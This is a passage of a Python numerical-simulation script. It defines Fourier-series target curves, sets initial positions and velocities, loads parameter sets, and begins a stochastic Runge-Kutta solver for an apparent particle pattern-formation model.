1353/7 *np.sin(t + 11/7) + 31/11 *np.sin(6 *t + 8/5) + 113/10 *np.sin(7 *t + 33/7) + 27/7 *np.sin(8 *t + 14/9) + 23/8 *np.sin(9 *t + 33/7) + 7/6 *np.sin(10 *t + 13/8) + 5/12 *np.sin(13 *t + 37/8) + 2/3 *np.sin(16 *t + 51/11) + 3/8 *np.sin(18 *t + 8/5) + 7126/15) *theta(51 *np.pi - t) *theta(t - 47 *np.pi) + (-2/9 *np.sin(1/3 - 4 *t) + 791/5 *np.sin(t + 11/7) + 10/19 *np.sin(2 *t + 9/14) + 118/7 *np.sin(3 *t + 14/9) + 21/4 *np.sin(5 *t + 11/7) + 1/9 *np.sin(6 *t + 117/58) + 30/11 *np.sin(7 *t + 14/9) + 5/13 *np.sin(8 *t + 17/14) + 7/4 *np.sin(9 *t + 28/19) + 3/14 *np.sin(10 *t + 15/16) + 12/13 *np.sin(11 *t + 19/12) + 1/15 *np.sin(12 *t + 43/13) + 11/16 *np.sin(13 *t + 13/8) + 2251/5) *theta(47 *np.pi - t) *theta(t - 43 *np.pi) + (3724/25 *np.sin(t + 11/7) + 1/3 *np.sin(2 *t + 16/9) + 266/17 *np.sin(3 *t + 11/7) + 10/13 *np.sin(4 *t + 19/11) + 34/7 *np.sin(5 *t + 19/12) + 5/12 *np.sin(6 *t + 5/3) + 20/11 *np.sin(7 *t + 8/5) + 1/5 *np.sin(8 *t + 11/7) + 7/5 *np.sin(9 *t + 19/12) + 2/7 *np.sin(10 *t + 5/3) + 7/8 *np.sin(11 *t + 14/9) + 1/51 *np.sin(12 *t + 47/16) + 7/9 *np.sin(13 *t + 13/8) + 1/10 *np.sin(14 *t + 50/11) + 12403/28) *theta(43 *np.pi - t) *theta(t - 39 *np.pi) + (-4/7 *np.sin(5/9 - 19 *t) + 4341/11 *np.sin(t + 17/11) + 595/6 *np.sin(2 *t + 14/3) + 1286/17 *np.sin(3 *t + 37/8) + 314/9 *np.sin(4 *t + 23/15) + 121/3 *np.sin(5 *t + 37/8) + 222/17 *np.sin(6 *t + 21/5) + 103/9 *np.sin(7 *t + 23/5) + 29/5 *np.sin(8 *t + 25/6) + 127/9 *np.sin(9 *t + 49/11) + 11/6 *np.sin(10 *t + 37/19) + 23/3 *np.sin(11 *t + 23/5) + 77/13 *np.sin(12 *t + 23/12) + 97/7 *np.sin(13 *t + 41/9) + 29/7 *np.sin(14 *t + 17/8) + 39/7 *np.sin(15 *t + 49/11) + 5/8 *np.sin(16 *t + 19/11) + 5/11 *np.sin(17 *t + 17/9) + 2/3 *np.sin(18 *t + 27/7) + 19/13 *np.sin(20 *t + 37/12) + 84/13 *np.sin(21 *t + 25/6) + 11/23 *np.sin(22 *t + 41/14) + 45/13 *np.sin(23 *t + 31/32) + 3/14 *np.sin(24 *t + 41/20) + 49/13 *np.sin(25 *t + 41/10) + 16/11 *np.sin(26 *t + 17/11) + 12/7 *np.sin(27 *t + 22/5) + 37/13 *np.sin(28 *t + 48/13) + 4/3 *np.sin(29 *t + 3) + 31/11 *np.sin(30 *t + 3/10) + 79/15 *np.sin(31 *t + 10/11) + 10753/21) *theta(39 *np.pi - t) *theta(t - 35 *np.pi) + 
(-16/9 *np.sin(13/9 - 8 *t) - 108/19 *np.sin(8/11 - 6 *t) + 17/13 *np.sin(t + 8/7) + 7/3 *np.sin(2 *t + 21/10) + 24/7 *np.sin(3 *t + 20/9) + 26/7 *np.sin(4 *t + 32/7) + 26/11 *np.sin(5 *t + 11/4) + 105/19 *np.sin(7 *t + 30/7) + 6/7 *np.sin(9 *t + 5/11) + 23/15 *np.sin(10 *t + 7/5) + 11/6 *np.sin(11 *t + 11/3) + 12822/23) *theta(35 *np.pi - t) *theta(t - 31 *np.pi) + (-5/8 *np.sin(11/12 - 10 *t) - 64/13 *np.sin(13/14 - 6 *t) + 7/5 *np.sin(t + 45/11) + 74/21 *np.sin(2 *t + 1/7) + 52/15 *np.sin(3 *t + 39/10) + 5/8 *np.sin(4 *t + 3/5) + 17/11 *np.sin(5 *t + 7/6) + 39/8 *np.sin(7 *t + 51/13) + 15/8 *np.sin(8 *t + 29/8) + 16/9 *np.sin(9 *t + 14/3) + 97/48 *np.sin(11 *t + 5/9) + 3401/10) *theta(31 *np.pi - t) *theta(t - 27 *np.pi) + (-12/25 *np.sin(17/13 - 6 *t) - 7/11 *np.sin(4/7 - 4 *t) - 14/27 *np.sin(3/13 - 2 *t) + 351/10 *np.sin(t + 11/8) + 17/6 *np.sin(3 *t + 28/27) + 9/8 *np.sin(5 *t + 10/13) + 3921/7) *theta(27 *np.pi - t) *theta(t - 23 *np.pi) + (431/8 *np.sin(t + 4/5) + 199/25 *np.sin(2 *t + 40/9) + 2328/7) *theta(23 *np.pi - t) *theta(t - 19 *np.pi) + (-2/3 *np.sin(5/4 - 9 *t) - 11/9 *np.sin(4/3 - 5 *t) - 74/21 *np.sin(1/13 - 4 *t) + 107/6 *np.sin(t + 8/17) + 73/10 *np.sin(2 *t + 12/11) + 53/12 *np.sin(3 *t + 48/11) + 4/9 *np.sin(6 *t + 31/13) + 4/11 *np.sin(7 *t + 5/13) + 5/14 *np.sin(8 *t + 127/42) + 5/16 *np.sin(10 *t + 17/9) + 2/5 *np.sin(11 *t + 29/7) + 2378/13) *theta(19 *np.pi - t) *theta(t - 15 *np.pi) + (194/13 *np.sin(t + 51/14) + 93/23 *np.sin(2 *t + 43/12) + 13/8 *np.sin(3 *t + 57/17) + 9/5 *np.sin(4 *t + 32/13) + 14050/21) *theta(15 *np.pi - t) *theta(t - 11 *np.pi) + (-19/18 *np.sin(1/11 - 16 *t) - 8/11 *np.sin(1/6 - 14 *t) - 13/11 *np.sin(1 - 7 *t) - 9/8 *np.sin(7/11 - 5 *t) - 148/9 *np.sin(1/7 - 2 *t) + 19/6 *np.sin(t + 37/8) + 625/11 *np.sin(3 *t + 8/5) + 241/24 *np.sin(4 *t + 1/6) + 16/17 *np.sin(6 *t + 7/5) + 95/47 *np.sin(8 *t + 1/4) + 20/9 *np.sin(9 *t + 12/7) + 11/5 *np.sin(10 *t + 1/4) + 3/7 *np.sin(11 *t + 2/3) + 9/19 *np.sin(12 *t + 28/9) + 3/5 *np.sin(13 *t + 25/6) + 2/11 *np.sin(15 *t + 13/9) + 1/3 *np.sin(17 *t + 1/6) + 3925/7) *theta(11 *np.pi - t) *theta(t - 7 *np.pi) + (-31/12 *np.sin(11/12 - 6 *t) - 244/9 *np.sin(15/11 - 4 *t) - 186/5 *np.sin(7/6 - 2 *t) + 911/26 *np.sin(t + 74/21) + 317/7 *np.sin(3 *t + 1/3) + 28/9 *np.sin(5 *t + 52/15) + 33/17 *np.sin(7 *t + 12/5) + 7/10 *np.sin(8 *t + 13/7) + 6/7 *np.sin(9 *t + 9/5) + 6/7 *np.sin(10 *t + 11/4) + 13/5 *np.sin(11 *t + 4/7) + 2721/8) *theta(7 *np.pi - t) *theta(t - 3 *np.pi) + (-10/7 *np.sin(14/9 - 12 *t) - 11/7 *np.sin(7/9 - 11 *t) - 51/19 *np.sin(3/2 - 4 *t) - 89/4 *np.sin(18/13 - 3 *t) - 81/10 *np.sin(12/25 - 2 *t) + 2029/8 *np.sin(t + 3/2) + 3 *np.sin(5 *t + 3/5) + 23/15 *np.sin(6 *t + 29/10) + 74/15 *np.sin(7 *t + 51/25) + 10/11 *np.sin(8 *t + 32/21) + 13/6 *np.sin(9 *t + 8/5) + 2/7 *np.sin(10 *t + 16/7) + 4407/10) *theta(3 *np.pi - t) *theta(t +np.pi)) *theta(np.sin(t/2))
Y = ((41/2 *np.sin(t + 61/13) + 163/18 *np.sin(2 *t + 14/3) + 1/2 *np.sin(3 *t + 41/9) + 3802/5) *theta(91 *np.pi - t) *theta(t - 87 *np.pi) + (-12/7 *np.sin(7/5 - 17 *t) - 41/11 *np.sin(11/7 - 9 *t) - 3/7 *np.sin(11/8 - 4 *t) + 1175/14 *np.sin(t + 47/10) + 9961/40 *np.sin(2 *t + 33/7) + 555/8 *np.sin(3 *t + 11/7) + 39/5 *np.sin(5 *t + 14/9) + 11/5 *np.sin(6 *t + 3/2) + 25/2 *np.sin(7 *t + 47/10) + 155/12 *np.sin(8 *t + 14/9) + 33/10 *np.sin(10 *t + 19/12) + 14/5 *np.sin(11 *t + 51/11) + 64/7 *np.sin(12 *t + 14/3) + 45/7 *np.sin(13 *t + 11/7) + 1/14 *np.sin(14 *t + 49/13) + 1/2 *np.sin(15 *t + 16/13) + 76/25 *np.sin(16 *t + 19/12) + 23/5 *np.sin(18 *t + 26/17) + 191/38 *np.sin(19 *t + 47/10) + 47/13 *np.sin(20 *t + 23/15) + 62/9 *np.sin(21 *t + 33/7) + 31/9 *np.sin(22 *t + 37/25) + 31/4 *np.sin(23 *t + 16/11) + 18/7 *np.sin(24 *t + 4/3) + 91/15 *np.sin(25 *t + 3/2) + 29/7 *np.sin(26 *t + 14/3) + 49/25 *np.sin(27 *t + 47/10) + 9/4 *np.sin(28 *t + 23/5) + 57/56 *np.sin(29 *t + 6/5) + 83/10 *np.sin(30 *t + 16/11) + 18532/29) *theta(87 *np.pi - t) *theta(t - 83 *np.pi) + (-9/7 *np.sin(4/3 - 25 *t) - 106/11 *np.sin(16/11 - 22 *t) - 11/3 *np.sin(17/11 - 11 *t) - 1/17 *np.sin(1/16 - 9 *t) - 2/9 *np.sin(3/2 - 8 *t) - 2/9 *np.sin(11/9 - 6 *t) + 38/39 *np.sin(t + 14/3) + 9/5 *np.sin(2 *t + 61/13) + 19/7 *np.sin(3 *t + 8/5) + 22/5 *np.sin(4 *t + 33/7) + 8/11 *np.sin(5 *t + 3/2) + 95/94 *np.sin(7 *t + 14/9) + 25/13 *np.sin(10 *t + 13/8) + 3/5 *np.sin(12 *t + 14/3) + 2/11 *np.sin(13 *t + 17/4) + 35/11 *np.sin(14 *t + 14/3) + 17/5 *np.sin(15 *t + 51/11) + 84/13 *np.sin(16 *t + 89/19) + 51/8 *np.sin(17 *t + 51/11) + 5/8 *np.sin(18 *t + 17/5) + 35/6 *np.sin(19 *t + 61/13) + 11/9 *np.sin(20 *t + 9/2) + 21/13 *np.sin(21 *t + 27/16) + 77/12 *np.sin(23 *t + 8/5) + 151/14 *np.sin(24 *t + 21/13) + 2152/7) *theta(83 *np.pi - t) *theta(t - 79 *np.pi) + (-14/11 *np.sin(20/13 - 7 *t) - 47/8 *np.sin(14/9 - 3 *t) - 388/7 *np.sin(11/7 - t) + 18/11 *np.sin(2 *t + 3/2) + 4/3 *np.sin(4 *t + 19/12) + 19/14 *np.sin(5 *t + 47/10) + 3/11 *np.sin(6 *t + 25/17) + 1/24 *np.sin(8 *t + 9/14) + 1/3 *np.sin(9 *t + 47/10) + 5435/13) *theta(79 *np.pi - t) *theta(t - 75 *np.pi) + (-5/2 *np.sin(14/9 - 5 *t) - 42/11 *np.sin(11/7 - 3 *t) - 237/19 *np.sin(11/7 - t) + 86/3 *np.sin(2 *t + 11/7) + 14/15 *np.sin(4 *t + 11/7) + 17/8 *np.sin(6 *t + 11/7) + 15/16 *np.sin(7 *t + 8/5) + 4683/10) *theta(75 *np.pi - t) *theta(t - 71 *np.pi) + (-5/7 *np.sin(14/9 - 13 *t) - 11/16 *np.sin(14/9 - 9 *t) - 13/6 *np.sin(11/7 - 5 *t) - 2/7 *np.sin(20/13 - 4 *t) - np.sin(11/7 - 3 *t) - 341/34 *np.sin(11/7 - t) + 5/3 *np.sin(2 *t + 11/7) + 19/8 *np.sin(6 *t + 19/12) + 1/11 *np.sin(7 *t + 55/12) + 7/6 *np.sin(8 *t + 19/12) + 3/8 *np.sin(10 *t + 11/7) + 1/10 *np.sin(11 *t + 5/3) + 1/2 *np.sin(12 *t + 19/12) + 7/10 *np.sin(14 *t + 8/5) + 469/2) *theta(71 *np.pi - t) *theta(t - 67 *np.pi) + (-3/10 *np.sin(14/9 - 8 *t) + 16/11 *np.sin(t + 75/16) + 63/2 *np.sin(2 *t + 11/7) + 5/7 *np.sin(3 *t + 8/5) + 2/3 *np.sin(4 *t + 13/8) + 1/33 *np.sin(5 *t + 9/2) + 23/7 *np.sin(6 *t + 11/7) + 1/29 *np.sin(7 *t + 14/3) + 1/5 *np.sin(9 *t + 61/13) + 3265/9) *theta(67 *np.pi - t) *theta(t - 63 *np.pi) + (-16/13 *np.sin(11/7 - 4 *t) - 59/12 *np.sin(11/7 - t) + 183/5 *np.sin(2 *t + 11/7) + 5/4 *np.sin(3 *t + 14/9) + 8/7 *np.sin(5 *t + 47/10) + 80/27 *np.sin(6 *t + 11/7) + 14/13 *np.sin(7 *t + 19/12) + 20/19 *np.sin(8 *t + 33/7) + 10934/29) *theta(63 *np.pi - t) *theta(t - 59 *np.pi) + (-7/9 *np.sin(29/19 - 15 *t) - 121/60 *np.sin(17/11 - 5 *t) - 742/11 *np.sin(11/7 - t) + 494/11 
*np.sin(2 *t + 19/12) + 74/15 *np.sin(3 *t + 19/12) + 78/7 *np.sin(4 *t + 21/13) + 47/10 *np.sin(6 *t + 13/8) + 35/17 *np.sin(7 *t + 27/16) + 17/7 *np.sin(8 *t + 19/12) + 5/16 *np.sin(9 *t + 19/8) + 22/9 *np.sin(10 *t + 11/7) + 2/11 *np.sin(11 *t + 39/10) + 10/11 *np.sin(12 *t + 19/12) + 5/13 *np.sin(13 *t + 12/7) + 3/7 *np.sin(14 *t + 23/14) + 1/4 *np.sin(16 *t + 18/11) + 1/12 *np.sin(17 *t + 15/7) + 4470/11) *theta(59 *np.pi - t) *theta(t - 55 *np.pi) + (-2/9 *np.sin(17/11 - 21 *t) - 9/7 *np.sin(3/2 - 18 *t) - 3/10 *np.sin(22/15 - 17 *t) - 23/7 *np.sin(14/9 - 8 *t) + 18/11 *np.sin(t + 8/5) + 155/4 *np.sin(2 *t + 11/7) + 9/7 *np.sin(3 *t + 28/17) + 173/10 *np.sin(4 *t + 11/7) + 14/13 *np.sin(5 *t + 75/16) + 22/9 *np.sin(6 *t + 8/5) + 1/7 *np.sin(7 *t + 16/9) + 5/3 *np.sin(9 *t + 8/5) + 9/8 *np.sin(10 *t + 8/5) + 16/9 *np.sin(11 *t + 8/5) + 8/3 *np.sin(12 *t + 8/5) + 3/13 *np.sin(13 *t + 14/3) + 29/30 *np.sin(14 *t + 11/7) + 1/6 *np.sin(15 *t + 16/9) + 7/8 *np.sin(16 *t + 28/17) + 5/16 *np.sin(19 *t + 18/11) + 11/12 *np.sin(20 *t + 18/11) + 1/7 *np.sin(22 *t + 9/7) + 3262/11) *theta(55 *np.pi - t) *theta(t - 51 *np.pi) + (-7/8 *np.sin(17/11 - 18 *t) - 7/6 *np.sin(17/11 - 17 *t) - 3/10 *np.sin(23/15 - 15 *t) - 17/10 *np.sin(11/7 - 10 *t) - 24/7 *np.sin(14/9 - 9 *t) - 24/25 *np.sin(14/9 - 8 *t) - 40/11 *np.sin(11/7 - 7 *t) + 19/10 *np.sin(t + 33/7) + 39/7 *np.sin(2 *t + 11/7) + 162/19 *np.sin(3 *t + 11/7) + 123/8 *np.sin(4 *t + 11/7) + 33/7 *np.sin(5 *t + 11/7) + 77/9 *np.sin(6 *t + 11/7) + 21/22 *np.sin(11 *t + 8/5) + 9/17 *np.sin(12 *t + 21/13) + 31/12 *np.sin(13 *t + 19/12) + 1/20 *np.sin(14 *t + 23/5) + 5/14 *np.sin(16 *t + 8/5) + 16814/23) *theta(51 *np.pi - t) *theta(t - 47 *np.pi) + (-102/11 *np.sin(11/7 - t) + 29/7 *np.sin(2 *t + 33/7) + 27/10 *np.sin(3 *t + 19/12) + 17/7 *np.sin(4 *t + 47/10) + 2/11 *np.sin(5 *t + 13/7) + 37/14 *np.sin(6 *t + 47/10) + 1/13 *np.sin(7 *t + 85/21) + 51/26 *np.sin(8 *t + 47/10) + 5/6 *np.sin(9 *t + 8/5) + 3/5 *np.sin(10 *t + 47/10) + 8/13 *np.sin(11 *t + 8/5) + 9/13 *np.sin(12 *t + 47/10) + 1/10 *np.sin(13 *t + 53/12) + 9028/13) *theta(47 *np.pi - t) *theta(t - 43 *np.pi) + (-1/2 *np.sin(17/11 - 14 *t) - 15/11 *np.sin(14/9 - 10 *t) - 29/11 *np.sin(14/9 - 8 *t) - 29/9 *np.sin(14/9 - 6 *t) - 1/3 *np.sin(13/9 - 5 *t) - 108/13 *np.sin(14/9 - 4 *t) - 12/7 *np.sin(14/9 - t) + 4/13 *np.sin(2 *t + 8/5) + 15/11 *np.sin(3 *t + 11/7) + 7/6 *np.sin(7 *t + 11/7) + 1/15 *np.sin(9 *t + 5/4) + 1/9 *np.sin(11 *t + 16/11) + 1/10 *np.sin(12 *t + 12/7) + 3/8 *np.sin(13 *t + 8/5) + 5872/9) *theta(43 *np.pi - t) *theta(t - 39 *np.pi) + (-6/7 *np.sin(38/25 - 30 *t) - 6/5 *np.sin(1/21 - 28 *t) - 13/8 *np.sin(7/9 - 18 *t) + 275/3 *np.sin(t + 23/5) + 3929/11 *np.sin(2 *t + 14/3) + 219/4 *np.sin(3 *t + 27/16) + 421/11 *np.sin(4 *t + 47/10) + 101/6 *np.sin(5 *t + 26/17) + 242/9 *np.sin(6 *t + 4/3) + 153/13 *np.sin(7 *t + 1) + 73/6 *np.sin(8 *t + 5/4) + 65/9 *np.sin(9 *t + 13/11) + 47/14 *np.sin(10 *t + 9/7) + 51/11 *np.sin(11 *t + 25/6) + 25/7 *np.sin(12 *t + 17/13) + 13/2 *np.sin(13 *t + 9/8) + 40/17 *np.sin(14 *t + 16/17) + 36/7 *np.sin(15 *t + 46/47) + 2 *np.sin(16 *t + 2/7) + 52/21 *np.sin(17 *t + 10/7) + 55/12 *np.sin(19 *t + 6/5) + 17/8 *np.sin(20 *t + 1/3) + 17/6 *np.sin(21 *t + 58/57) + 37/12 *np.sin(22 *t + 35/8) + 3/4 *np.sin(23 *t + 12/13) + 28/13 *np.sin(24 *t + 4/5) + 37/19 *np.sin(25 *t + 19/5) + 7/10 *np.sin(26 *t + 55/13) + 89/14 *np.sin(27 *t + 7/8) + 15/7 *np.sin(29 *t + 23/6) + 7/11 *np.sin(31 *t + 11/14) + 8933/13) *theta(39 *np.pi - t) *theta(t - 35 *np.pi) + 
(-17/9 *np.sin(9/14 - 11 *t) - 4/3 *np.sin(1/5 - 8 *t) - 29/6 *np.sin(3/8 - 7 *t) + 13/8 *np.sin(t + 11/6) + 6/5 *np.sin(2 *t + 30/7) + 8/7 *np.sin(3 *t + 31/11) + 13/6 *np.sin(4 *t + 1/11) + 4/5 *np.sin(5 *t + 31/7) + 31/9 *np.sin(6 *t + 8/11) + 1/3 *np.sin(9 *t + 39/20) + 9/5 *np.sin(10 *t + 13/4) + 7555/14) *theta(35 *np.pi - t) *theta(t - 31 *np.pi) + (-11/10 *np.sin(10/9 - 8 *t) - 9/2 *np.sin(2/5 - 7 *t) - 18/11 *np.sin(10/11 - 3 *t) + 17/9 *np.sin(t + 32/7) + 6/5 *np.sin(2 *t + 38/13) + 19/14 *np.sin(4 *t + 28/9) + 13/9 *np.sin(5 *t + 3) + 15/4 *np.sin(6 *t + 3/4) + 60/17 *np.sin(9 *t + 1/14) + 10/9 *np.sin(10 *t + 5/4) + 13/7 *np.sin(11 *t + 30/13) + 9899/18) *theta(31 *np.pi - t) *theta(t - 27 *np.pi) + (-2/11 *np.sin(2/9 - 5 *t) + 110/7 *np.sin(t + 35/12) + 16/9 *np.sin(2 *t + 68/15) + 3/14 *np.sin(3 *t + 36/13) + 1/2 *np.sin(4 *t + 7/2) + 1/7 *np.sin(6 *t + 45/13) + 2682/5) *theta(27 *np.pi - t) *theta(t - 23 *np.pi) + (157/9 *np.sin(t + 69/34) + 19/3 *np.sin(2 *t + 20/7) + 2169/4) *theta(23 *np.pi - t) *theta(t - 19 *np.pi) + (-3/2 *np.sin(3/13 - 7 *t) - 13/4 *np.sin(11/12 - 4 *t) - 131/7 *np.sin(5/4 - 2 *t) + 370/7 *np.sin(t + 74/17) + 31/3 *np.sin(3 *t + 47/16) + 11/4 *np.sin(5 *t + 50/11) + 43/11 *np.sin(6 *t + 19/7) + 23/14 *np.sin(8 *t + 33/10) + 3/5 *np.sin(9 *t + 21/11) + 1/10 *np.sin(10 *t + 1/16) + 1/3 *np.sin(11 *t + 62/25) + 5541/11) *theta(19 *np.pi - t) *theta(t - 15 *np.pi) + (171/4 *np.sin(t + 37/8) + 7/9 *np.sin(2 *t + 18/13) + 41/10 *np.sin(3 *t + 40/9) + 6/11 *np.sin(4 *t + 15/11) + 5012/11) *theta(15 *np.pi - t) *theta(t - 11 *np.pi) + (-12/13 *np.sin(7/5 - 12 *t) - 13/8 *np.sin(13/11 - 10 *t) + 43/12 *np.sin(t + 7/9) + 279/35 *np.sin(2 *t + 9/2) + 201/14 *np.sin(3 *t + 2/9) + 23/9 *np.sin(4 *t + 8/7) + 64/9 *np.sin(5 *t + 14/5) + 83/6 *np.sin(6 *t + 14/3) + 103/17 *np.sin(7 *t + 13/4) + 36/13 *np.sin(8 *t + 46/11) + 22/7 *np.sin(9 *t + 2/7) + 8/9 *np.sin(11 *t + 11/4) + 20/11 *np.sin(13 *t + 74/25) + 5/7 *np.sin(14 *t + 42/13) + 7/9 *np.sin(15 *t + 4/7) + 9/11 *np.sin(16 *t + 17/4) + 7/12 *np.sin(17 *t + 36/11) + 3437/6) *theta(11 *np.pi - t) *theta(t - 7 *np.pi) + (-22/7 *np.sin(7/9 - 9 *t) - 36/7 *np.sin(1 - 5 *t) - 181/26 *np.sin(6/5 - 3 *t) + 28/9 *np.sin(t + 5/6) + 131/22 *np.sin(2 *t + 26/7) + 127/13 *np.sin(4 *t + 23/5) + 21/4 *np.sin(6 *t + 1/10) + 40/3 *np.sin(7 *t + 22/23) + 88/13 *np.sin(8 *t + 23/5) + 115/38 *np.sin(10 *t + 3/7) + 11/9 *np.sin(11 *t + 11/8) + 8493/14) *theta(7 *np.pi - t) *theta(t - 3 *np.pi) + (-8/7 *np.sin(16/13 - 10 *t) - 23/10 *np.sin(4/3 - 7 *t) - 3961/12 *np.sin(1/19 - t) + 55/3 *np.sin(2 *t + 13/11) + 9/17 *np.sin(3 *t + 31/13) + 81/7 *np.sin(4 *t + 9/2) + 113/17 *np.sin(5 *t + 13/4) + 40/9 *np.sin(6 *t + 12/11) + 24/23 *np.sin(8 *t + 53/21) + 19/8 *np.sin(9 *t + 3/7) + 3/13 *np.sin(11 *t + 18/5) + 45/44 *np.sin(12 *t + 5/7) + 6798/13) *theta(3 *np.pi - t) *theta(t +np.pi)) *theta(np.sin(t/2))
else :
print("error : there is not such curve name")
quit()
Target = np.array([X,Y]).T
if jump==1:
Jcheck0=np.zeros(num)
for i in range(num-1) :
Jcheck0[i]=np.count_nonzero(Target[i+1:] == Target[i])
Jcheck1= Target[:] != [[0,0]]
Jcheck = np.logical_and(Jcheck0[:]==0,Jcheck1[:,0])
Target=Target[Jcheck]
t=np.linspace(0,dom,Jcheck.sum(),endpoint=False)
print(Jcheck.sum())
return Target,t
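# setPVinit: for setting==0, draw random initial positions centred on the target pattern Z
# and random velocities with zero mean; otherwise load Pinit/Vinit from CSV files.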
def setPVinit(setting) :
global Pinit, Vinit
global Xbmean, Vimean
if setting==0:
Pinitlen=int((np.max(Z)-np.min(Z)))
# Pinitlen=20
coeff=0.25
# coeff=0.5
# coeff=1.25
P_range=Pinitlen*coeff
print("P_range = %f" %P_range)
Pinit=np.random.rand(N,2)*P_range-P_range/2
Pinit-=np.array(np.mean(Pinit[:],axis=0))
Pinit+=np.array(np.mean(Z[:],axis=0))
v_range=50
v_s=np.random.randint(-10,10,size=2)
v_s=np.array([0,0])
print("v_s = %.1f,%.1f" %(v_s[0],v_s[1]))
Vinit=(np.random.rand(N,2)*v_range)-v_range/2 + v_s # multiplying np.arrays directly gives an element-wise (component-wise) product
Vimean=np.array(np.mean(Vinit[:],axis=0))
Vinit-=Vimean
else :
print(os.getcwd())
Pinit_df=pd.read_csv('./Pinit_%s.csv' %set_name,delimiter='\t')
Vinit_df=pd.read_csv('./Vinit_%s.csv' %set_name,delimiter='\t')
Pinit=Pinit_df.to_numpy()
Vinit=Vinit_df.to_numpy()
print(Pinit.shape)
Xbimean=np.array(np.mean(Pinit[:]-Z[:],axis=0))
print("\nbarX_i mean={}".format(Xbimean))
Vimean=np.array(np.mean(Vinit[:],axis=0))
print("\nVimean={}".format(Vimean))
def set_dBcum(setting) :
global dBcum
dBcum=np.zeros((Trial+1,2,T))
if setting == 0 :
dBcum[1:,0,:]=np.random.normal(0,np.sqrt(h),(Trial,T))
dBcum[1:,1,:]=np.random.randint(0,2,(Trial,T))*2-1 # S = +/-1 with equal probability (randint's upper bound is exclusive; (0,1) would always give -1)
else :
dBcum_df=pd.read_csv('./dBcum.csv',delimiter='\t')
dBcum_np=dBcum_df.to_numpy()
dBcum=dBcum_np.reshape(-1,2,T)
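# settings: load one of the named parameter sets ('ein' or 'pi') into module-level globals.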
def settings(set_name) :
global N
global alpha, beta, psLB, phLB
global K, M, L, T
global curvetype,nettype, h
global PVinitset, dBset
if set_name=='ein' :
##ein set
N=500
alpha=0.25
beta=alpha
psLB=0.3
phLB=0.1
K=0.5
M=7
L=0.00001 #L=sigma
T=400 #T : number of steps for solving the DE
T=180
curvetype=3
# nettype=[0,0,0]
nettype=[3,1,0]
nettype=[4,4,0]
# nettype=[4,3,0]
PVinitset=1 # 0: generate new initial data for P,V; otherwise load it from CSV
h=0.025/2 #h=\Delta t ~ dt
dBset=0
elif set_name=='pi' :
##pi set
N=30
alpha=0.25
beta=alpha
psLB=0.31
phLB=0.1
K=5
M=7
L=0.001 #L=sigma
T=400 #T : number of steps for solving the DE
T=1400
curvetype=1
# nettype=[0,0,0]
nettype=[3,1,0]
# nettype=[4,3,0]
PVinitset=1 # 0: generate new initial data for P,V; otherwise load it from CSV
h=0.025 #h=\Delta t ~ dt
dBset=0
# cut=100
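# make_variables: compute the initial values of the monitored quantities
# (velocity fluctuation Vnrm, pattern deviation Xbnrm, potential energy phE) from Pinit/Vinit.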
def make_variables():
global P, V
global Pdiff, Vnrmi, Xbave, Xbnrmi, phEi
P=np.array([Pinit])
V=np.array([Vinit])
print(P[0])
print(V[0])
print(Vimean)
## Vnrm(t) = sum_i |v_t^i - v_t^ave|^2, computed as sum_i |v_t^i|^2 - N*|v_t^ave|^2
s=np.power(Vinit[:,0],2)+np.power(Vinit[:,1],2)
Vnrmi=np.sum(s)-N*np.sum(np.power(Vimean,2))
## Xbnrm(t) = sum_i |x*_i-x*_ave|^2 = \sum_{i} |\bar{x}_t^i-\bar{x}_t^ave|^2
Xbave=np.mean(Pinit,axis=0)-np.mean(Z,axis=0) # mean of Pinit-Z, consistent with Xbmean in the main loop (zero when the initial data are centred)
Xbnrmi=np.sum(np.power(Pinit[:,0]-Z[:,0]-Xbave[0],2)+np.power(Pinit[:,1]-Z[:,1]-Xbave[1],2))
##phE(t)=\sum_{i,j\in\calE} \int_0^|\bar{x}_t^{ij}|^2 \phi(r)dr
phEi=0
for i in range(N):
J = A_ph[i,:]==1
ssq=(np.power(P[0,i,0]-Z[i,0]-P[0,:,0]+Z[:,0],2)+np.power(P[0,i,1]-Z[i,1]-P[0,:,1]+Z[:,1],2))[J]
phEi+=np.sum(phiEest(ssq,beta,phLB))
phEi*=M/2
if __name__ == '__main__':
version=2.00
##inputs and settings
set_name='pi'
test_name='test'
settings(set_name)
Trial=5
cut=10
dataset=0 # 0: solve the DE from scratch, 1: load previously saved solutions
##Setting target pattern. /curvetype
# if jump==1, the target "curve" is disconnected
if curvetype==0:
curvename='circle'
domain=2*np.pi
jump=0
elif curvetype==1:
curvename='pi'
domain=2*np.pi
jump=0
elif curvetype==2:
curvename='b.simpson'
domain=72*np.pi
jump=1
elif curvetype==3:
curvename='einstein'
domain=92*np.pi
jump=1
Z,Domain=Curve(domain) #Set Z as given curve
# A : adjacency matrix / nettype
zeta=['ps','ph','b']
for ind in range(3):
A=makenet(nettype[ind])
globals()['A_{}'.format(zeta[ind])]=np.copy(A)
print(A_ps)
##Setting a initial data of P,V / PVinitset
# P : positions, V : velocity. i.e. P=\bx, V=\bv
setPVinit(PVinitset)
## Making variables : P, V, and Pdiff, Vnrm, nV, Xbnrm, phE, calH
make_variables()
# TODO: check whether preallocating the cumulative arrays beforehand is faster than appending like this, and which approach uses less memory
# -> the speed difference was negligible; surprisingly, appending even seemed slightly faster
Pcum=np.array([np.zeros((T,N,2))])
Vcum=np.array([np.zeros((T,N,2))])
nVcum=np.array([np.zeros((T,N,2))])
Vnrmcum=np.array([np.zeros(T)])
phEcum=np.array([np.zeros(T)])
Xbnrmcum=np.array([np.zeros(T)])
#dBcum : saving values of dBt
set_dBcum(dBset)
# note: as a shortcut, the cumulative ndarrays keep index [0] as zeros and the actual values start at index [1]
## Main part
if dataset==0:
for trial in range (0,Trial):
P=np.zeros((T,N,2))
V=np.zeros((T,N,2))
Vnrm=np.zeros(T)
Xbnrm=np.zeros(T)
phE=np.zeros(T)
P[0]=np.array([Pinit])
V[0]=np.array([Vinit])
Vnrm[0]=Vnrmi
Xbnrm[0]=Xbnrmi
phE[0]=phEi
## Solving DE for each trial
for t in range(1,T):
# print ("start %dth loop" %t)
Pnow=np.copy(P[t-1])
Vnow=np.copy(V[t-1])
## Stochastic Runge Kutta.
## calculating P[t], V[t]
## P,V_t = P,V_t-1 + (K_1 /2 +K_2 /2)
## K_1 = h * csmpf (P,V_t-1)+ (dBt-1-S*sqrt(h)) * Br(P,V_t-1)
## K_2 = h * csmpf (P,V_t-1 + K_1)+ (dBt-1+S*sqrt(h)) * Br(P,V_t-1 + K_1)
## https://en.wikipedia.org/wiki/Runge%E2%80%93Kutta_method_(SDE)
